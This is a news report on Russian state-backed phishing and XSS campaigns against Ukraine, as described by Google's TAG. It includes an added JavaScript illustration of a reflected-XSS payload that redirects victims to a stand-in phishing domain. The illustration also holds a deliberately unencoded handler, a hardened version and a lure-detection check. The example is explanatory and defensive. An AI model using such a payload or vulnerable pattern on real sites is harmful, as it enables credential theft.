Google’s Threat Analysis Group (TAG) has been tracking and disrupting Russian state-sponsored cyberattacks against Ukraine’s critical infrastructure throughout 2023.
Hackers affiliated with Russia’s military intelligence service (the GRU) have been linked to extensive phishing campaigns that target hundreds of users in Ukraine, both to gather intelligence and to influence public discourse about the war.
TAG tracks the group as FROZENLAKE and reports that, continuing its 2022 activity, its attacks still concentrate on webmail users in Eastern Europe.
The threat actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, has been active since at least 2009, conducting espionage against media, government, and military organizations.
According to Google’s report, Ukraine was the primary target of phishing attacks originating from Russia, accounting for approximately 60% of the attacks between January and March 2023.
The primary objectives of these campaigns are intelligence gathering, operational disruptions, and leaking sensitive data.
The perpetrators also use Telegram channels to disseminate information that could damage Ukraine’s interests.
Starting in early February 2023, the latest intrusion set exploited reflected cross-site scripting (XSS) flaws on multiple Ukrainian government websites.
Because the injected script runs in the context of the trusted government site, the victim’s browser is redirected to a phishing domain where the attackers capture the login credentials entered there.
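The following is an added illustration of the reflected-XSS redirect technique described above; it is not code from Google’s report or from the campaign itself. The query parameter name, the trusted hostname `gov.example`, the phishing domain `webmail-login.example`, and the script payload are all constructed assumptions. It shows a handler that reflects a parameter unencoded, the same handler hardened with HTML-entity encoding, and a small check that flags a link to a trusted host whose query string carries markup:

```javascript
// Added example (not from the report): a reflected-XSS redirect of the kind
// described above, as a vulnerable handler beside its hardened form.
// PHISH, the "q" parameter and the hostnames below are assumptions.

const PHISH = "https://webmail-login.example"; // hypothetical attacker domain

// Vulnerable: the "q" parameter is reflected into the page without encoding,
// so markup in the query string becomes live HTML in the victim's browser.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Search results for: ${query}</h1></body></html>`;
}

// HTML-entity encoding for untrusted text placed in an element body or
// a quoted attribute value.
function escapeHtml(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Hardened: identical page, but the reflected input is encoded first, so the
// same payload is displayed as inert text instead of executing.
function renderSearchHardened(query) {
  return `<html><body><h1>Search results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed payload: when reflected unencoded it navigates the browser to
// the phishing domain, passing the legitimate page so the lure can mimic it.
const payload =
  `<script>location.href="${PHISH}/?next="+encodeURIComponent(location.href)</script>`;

// Extract the bodies of <script> elements from rendered HTML. Used here only
// to show whether the payload became executable code or stayed inert text.
function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Flag a link that points at a trusted hostname but carries markup or script
// handlers in any query value: the shape of a reflected-XSS phishing lure.
function looksLikeReflectedXssLink(url, trustedHosts) {
  let u;
  try { u = new URL(url); } catch { return false; }
  if (!trustedHosts.includes(u.hostname)) return false;
  const markup = /<\s*\/?\s*(script|img|svg|iframe|a)\b|javascript:|\bon\w+\s*=/i;
  return [...u.searchParams.values()].some((v) => markup.test(v));
}

// Build the lure the way a phisher would: a link to the real, trusted host
// whose query string smuggles the payload, then render it both ways.
function demo() {
  const trusted = ["gov.example"]; // assumed trusted government hostname
  const link = `https://gov.example/search?q=${encodeURIComponent(payload)}`;
  const q = new URL(link).searchParams.get("q");
  return {
    linkFlagged: looksLikeReflectedXssLink(link, trusted),
    vulnerableScripts: extractScripts(renderSearchVulnerable(q)),
    hardenedScripts: extractScripts(renderSearchHardened(q)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The lure is effective precisely because the hostname in the link is the genuine government site; only the query string is attacker-controlled. Output encoding at the point of reflection (plus a Content Security Policy that disallows inline script) is the server-side fix, and the link check models what a mail gateway or browser extension can do on the client side.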
Google’s TAG has identified three Russian and Belarusian threat actors that were the most active against Ukrainian targets in the first quarter of the year.
The first is Sandworm, which Google tracks as FROZENBARENTS and which has been targeting the energy sector in Europe since November 2022.
Notably, the group has launched attacks against the Caspian Pipeline Consortium (CPC).
In recent months, Sandworm has run several phishing campaigns using fake “Ukroboronprom” websites to target people working in the Ukrainian defense industry, users of the Ukr.net platform, and Ukrainian Telegram channels.
This disclosure comes amid a joint advisory from U.K. and U.S. intelligence and law enforcement agencies warning of APT28’s attacks.
The group has been exploiting an old SNMP vulnerability in Cisco IOS routers (CVE-2017-6742, patched in 2017) to deploy malware called Jaguar Tooth.